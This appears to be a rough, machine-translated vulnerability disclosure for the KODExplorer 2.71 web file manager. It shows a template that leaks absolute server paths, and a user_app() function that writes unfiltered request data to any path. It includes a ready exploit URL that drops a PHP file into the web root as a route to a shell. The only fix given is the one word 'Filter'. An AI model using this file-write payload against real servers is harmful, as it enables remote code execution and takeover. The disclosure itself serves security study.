Mango cloud KODExlporer Information Leakage + arbitrary command execution getshell (1)

Mango cloud KODExlporer Information Leakage + arbitrary command execution getshell (1)

First, a piece of information is exposed, and your absolute path is leaked... I also read files one by one.

In controller \ app. class. php
 

public function index() {        $this->display(TEMPLATE.'app/index.php');    }

Tracking parent class Controller

protected function display($tpl_file){global $L,$LNG;//var_dump($this->values);exit();extract($this->values);require($this->tpl.$tpl_file);}

Look at the template he contains!

Find templeate/index. php

<script src="<?php echo STATIC_PATH;?>js/lib/seajs/sea.js"></script><script type="text/javascript">          var LNG = <?php echo json_encode($L);?>;var G = {is_root : <?php echo  $GLOBALS['is_root'];?>,web_root : "<?php echo $GLOBALS['web_root'];?>",web_host : "<?php echo HOST;?>",static_path : "<?php echo STATIC_PATH;?>",        basic_path  : "<?php echo BASIC_PATH;?>",version : "<?php echo KOD_VERSION;?>"    };

The

web_host : "<?php echo HOST;?>",static_path : "<?php echo STATIC_PATH;?>",        basic_path  : "<?php echo BASIC_PATH;?>",version : "<?php echo KOD_VERSION;?>"

Look at the local

Have you seen it?

web_root : "E:/wwwroot/",web_host : "http://localhost/",static_path : "./static/",        basic_path  : "E:/wwwroot/www/",version : "2.71"

Let's see getshell!

Distribute... Otherwise, you will be given more...

0x02 getshell

Look at your second method.

 

public function user_app() {  //phpinfo();//var_dump($this->in['path']);exit();         $path = _DIR($this->in['path']); //echo $path."<br/>";        if (isset($this->in['action']) && $this->in['action'] == 'add'){            $path .= '.oexe';                    }        $data = json_decode(rawurldecode($this->in['data']),true);        unset($data['name']);unset($data['desc']);unset($data['group']);        $res  = file_put_contents($path, json_encode($data));        show_json($this->L['success']);    }

Here, $ path does not explain how it comes. Vendors know it... Let me get it. it's convenient.

$data = json_decode(rawurldecode($this->in['data']),true);        unset($data['name']);unset($data['desc']);unset($data['group']);        $res  = file_put_contents($path, json_encode($data));

See?

Directly $ this-> in ['data'] data ?? Are there any filters? Directly rawurldecode, then json_decode, delete several arrays, and write files directly... Have you considered the pain of your user's chrysanthemum?

I will try to write a file for you...

Http: // localhost/www/index. php? App/user_app & path = fuck. php & data = {"name": "1", "desc": "2", "group": "3", "0": "<? Php phpinfo ();?> "}

I will not explain it either... Vendor, you are so awesome, you know ....

Directly write the root directory ....

View

 

 

 

 

Solution:

Filter